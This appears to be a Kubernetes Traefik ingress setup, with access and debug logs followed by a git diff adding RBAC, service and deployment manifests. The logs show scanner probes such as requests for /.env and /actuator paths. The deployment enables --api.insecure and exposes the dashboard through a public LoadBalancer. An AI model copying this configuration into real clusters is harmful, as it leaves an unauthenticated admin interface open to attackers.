providerName=kubernetes +10.0.0.4 - - [31/Mar/2024:00:01:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1444 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:01:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1445 "api@internal" "-" 0ms +time="2024-03-31T00:02:13Z" level=debug msg="Skipping Kubernetes event kind *v1.Secret" providerName=kubernetes +time="2024-03-31T00:03:56Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:00:03:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1446 "-" "-" 0ms +time="2024-03-31T00:03:57Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:00:03:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1447 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:04:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1448 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:04:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1449 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:05:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1450 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:05:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1451 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:09:15 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1452 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:09:23 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1453 "-" "-" 0ms +time="2024-03-31T00:09:34Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:00:09:35 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 19 "-" "-" 1454 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:19:58 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1455 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:21:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1456 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:21:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1457 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:22:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1458 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:22:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1459 "api@internal" "-" 0ms +time="2024-03-31T00:25:44Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T00:31:07Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:00:31:08 +0000] "GET /geoserver HTTP/1.1" 404 19 "-" "-" 1460 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:00:33:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1461 "-" "-" 0ms +time="2024-03-31T00:33:18Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:00:33:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1462 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:39:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1463 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:39:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1464 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:40:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1465 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:40:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1466 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:42:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1467 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:42:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1468 "api@internal" "-" 0ms +time="2024-03-31T00:42:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:00:42:42 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1469 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:47:14 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1470 "-" "-" 0ms +time="2024-03-31T00:49:40Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T00:49:41Z" level=debug msg="http: TLS handshake error from 10.2.1.1:38282: read tcp 10.2.0.36:443->10.2.1.1:38282: read: connection reset by peer" +10.0.0.4 - - [31/Mar/2024:00:52:26 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1471 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:00:53:01 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1472 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:01:05:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1473 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:01:05:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1474 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:01:12:16 +0000] "GET / HTTP/1.0" 200 1163 "-" "-" 1475 "dashboard@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:01:14:23 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1476 "-" "-" 0ms +time="2024-03-31T01:16:19Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:01:16:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1477 "-" "-" 0ms +time="2024-03-31T01:16:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:01:16:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1478 "-" "-" 0ms +time="2024-03-31T01:19:48Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:01:21:11 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1479 "dashboard@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:01:21:11 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 1480 "dashboard@internal" "-" 0ms +time="2024-03-31T01:35:19Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T01:35:19Z" level=debug msg="http: TLS handshake error from 10.2.0.129:6735: remote error: tls: bad certificate" +10.2.0.129 - - [31/Mar/2024:01:42:44 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1481 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:01:43:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1482 "-" "-" 0ms +time="2024-03-31T01:43:44Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:01:43:44 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1483 "-" "-" 0ms +time="2024-03-31T01:43:45Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:01:43:45 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1484 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:01:44:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1485 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:01:44:09 +0000] "GET / HTTP/1.1" 302 0 "-" "-" 1486 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 36ms +10.2.0.129 - - [31/Mar/2024:01:44:17 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 2383 "-" "-" 1487 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 175ms +10.2.1.1 - - [31/Mar/2024:01:44:18 +0000] "GET /favicon.ico HTTP/1.1" 302 0 "-" "-" 1488 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 12ms +10.2.0.129 - - [31/Mar/2024:01:44:19 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 2384 "-" "-" 1489 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 56ms +time="2024-03-31T02:04:30Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T02:04:30Z" level=debug msg="http: TLS handshake error from 10.2.1.1:51368: read tcp 10.2.0.36:80->10.2.1.1:51368: read: connection reset by peer" +10.2.0.129 - - [31/Mar/2024:02:06:03 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1490 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:02:06:03 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1491 "api@internal" "-" 0ms +time="2024-03-31T02:06:51Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:02:06:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1492 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:02:10:41 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1493 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:02:16:35 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1494 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:02:16:35 +0000] "POST / HTTP/1.1" 404 19 "-" "-" 1495 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:02:25:26 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1496 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:02:31:28 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1497 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:02:31:37 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1498 "-" "-" 0ms +time="2024-03-31T02:31:38Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T02:34:58Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:02:34:58 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1499 "-" "-" 0ms +time="2024-03-31T02:34:59Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:02:34:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1500 "-" "-" 0ms +time="2024-03-31T02:37:42Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-31T02:41:05Z" level=debug msg="http: TLS handshake error from 10.2.1.1:57137: tls: client offered only unsupported versions: [301]" +time="2024-03-31T02:48:07Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T02:48:07Z" level=debug msg="http: TLS handshake error from 10.2.0.129:36979: read tcp 10.2.0.36:443->10.2.0.129:36979: read: connection reset by peer" +10.2.0.129 - - [31/Mar/2024:03:01:58 +0000] "GET / HTTP/1.0" 404 19 "-" "-" 1501 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:06:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1502 "-" "-" 0ms +10.2.1.1 - - [31/Mar/2024:03:11:51 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1503 "-" "-" 0ms +time="2024-03-31T03:16:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:16:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1504 "-" "-" 0ms +time="2024-03-31T03:16:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:16:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1505 "-" "-" 0ms +time="2024-03-31T03:16:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:16:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1506 "-" "-" 0ms +time="2024-03-31T03:16:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:16:10 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1507 "-" "-" 0ms +time="2024-03-31T03:16:17Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:16:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1508 "-" "-" 0ms +time="2024-03-31T03:16:18Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:16:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1509 "-" "-" 0ms +time="2024-03-31T03:16:25Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T03:16:35Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-31T03:17:19Z" level=debug msg="http: TLS handshake error from 10.0.0.4:29443: read tcp 10.2.0.36:443->10.0.0.4:29443: read: connection reset by peer" +time="2024-03-31T03:19:57Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:19:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1510 "-" "-" 0ms +time="2024-03-31T03:19:58Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:19:58 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1511 "-" "-" 0ms +time="2024-03-31T03:26:35Z" level=debug msg="http: TLS handshake error from 10.2.1.1:40153: EOF" +time="2024-03-31T03:28:14Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:28:18 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1512 "-" "-" 0ms +time="2024-03-31T03:28:19Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:28:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1513 "-" "-" 0ms +time="2024-03-31T03:29:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:29:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1514 "-" "-" 0ms +time="2024-03-31T03:29:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:29:06 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1515 "-" "-" 0ms +time="2024-03-31T03:29:15Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:29:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1516 "-" "-" 0ms +time="2024-03-31T03:29:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:29:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1517 "-" "-" 0ms +time="2024-03-31T03:29:24Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:29:24 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1518 "-" "-" 0ms +time="2024-03-31T03:29:26Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [31/Mar/2024:03:29:26 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1519 "-" "-" 0ms +time="2024-03-31T03:33:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [31/Mar/2024:03:33:47 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1520 "-" "-" 0ms +time="2024-03-31T03:33:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [31/Mar/2024:03:33:48 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1521 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:34:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1522 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:34:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1523 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:35:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1524 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:35:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1525 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:35:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1526 "api@internal" "-" 0ms +10.2.1.1 - - [31/Mar/2024:03:35:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1527 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:36:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1528 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:36:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1529 "api@internal" "-" 0ms +time="2024-03-31T03:36:20Z" level=debug msg="http: TLS handshake error from 10.2.0.129:17668: remote error: tls: unknown certificate" +10.0.0.4 - - [31/Mar/2024:03:36:20 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 1530 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:36:21 +0000] "GET /favicon.ico HTTP/2.0" 404 19 "-" "-" 1531 "-" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:36:45 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1532 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:36:45 +0000] "POST / HTTP/1.1" 404 19 "-" "-" 1533 "-" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:37:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1534 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:37:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1535 "api@internal" "-" 0ms +10.2.0.129 - - [31/Mar/2024:03:38:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1536 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:03:38:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1537 "api@internal" "-" 0ms diff --git a/traefik/00-account.yml b/traefik/00-account.yml new file mode 100644 index 0000000..566d892 --- /dev/null +++ b/traefik/00-account.yml @@ -0,0 +1,4 @@ +apiVersion: v1 +kind: ServiceAccount +metadata: + name: traefik-account diff --git a/traefik/00-role.yml b/traefik/00-role.yml new file mode 100644 index 0000000..7e07e3f --- /dev/null +++ b/traefik/00-role.yml @@ -0,0 +1,33 @@ +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: traefik-role + +rules: + - apiGroups: + - "" + resources: + - services + - endpoints + - secrets + verbs: + - get + - list + - watch + - apiGroups: + - extensions + - networking.k8s.io + resources: + - ingresses + - ingressclasses + verbs: + - get + - list + - watch + - apiGroups: + - extensions + - networking.k8s.io + resources: + - ingresses/status + verbs: + - update diff --git a/traefik/01-role-binding.yml b/traefik/01-role-binding.yml new file mode 100644 index 0000000..94d2557 --- /dev/null +++ b/traefik/01-role-binding.yml @@ -0,0 +1,14 @@ +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: traefik-role-binding + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: traefik-role +subjects: + - kind: ServiceAccount + name: traefik-account + # namespace: traefik + namespace: akashop diff --git a/traefik/02-traefik-services.yml b/traefik/02-traefik-services.yml new file mode 100644 index 0000000..76303c6 --- /dev/null +++ b/traefik/02-traefik-services.yml @@ -0,0 +1,30 @@ +apiVersion: v1 +kind: Service +metadata: + name: traefik-dashboard-service + +spec: + type: LoadBalancer + ports: + - port: 8080 + targetPort: dashboard + selector: + app: traefik +--- + +apiVersion: v1 +kind: Service +metadata: + name: traefik-web + +spec: + type: LoadBalancer + ports: + - name: http + targetPort: web + port: 80 + - name: https + targetPort: websecure + port: 443 + selector: + app: traefik \ No newline at end of file diff --git a/traefik/02-traefik.yml b/traefik/02-traefik.yml new file mode 100644 index 0000000..c9e9eae --- /dev/null +++ b/traefik/02-traefik.yml @@ -0,0 +1,42 @@ +kind: Deployment +apiVersion: apps/v1 +metadata: + name: traefik-deployment + labels: + app: traefik + +spec: + replicas: 1 + selector: + matchLabels: + app: traefik + template: + metadata: + labels: + app: traefik + spec: + serviceAccountName: traefik-account + containers: + - name: traefik + image: traefik:latest + args: + - --api.insecure + - --accesslog + - --log.level=DEBUG + - --providers.kubernetesingress + - --providers.kubernetesingress.allowexternalnameservices=true + # - --providers.kubernetescrd + # - --providers.kubernetescrd.allowCrossNamespace=true + - --entrypoints.web.address=:80 + - --entrypoints.websecure.address=:443 + - --certificatesresolvers.le.acme.email=learn@akamai.com + - --certificatesresolvers.le.acme.storage=acme.json + - --certificatesresolvers.le.acme.tlschallenge=true + - --certificatesresolvers.le.acme.caServer=https://acme-staging-v02.api.letsencrypt.org/directory + ports: + - name: web + containerPort: 80 + - name: websecure + containerPort: 443 + - name: dashboard + containerPort: 8080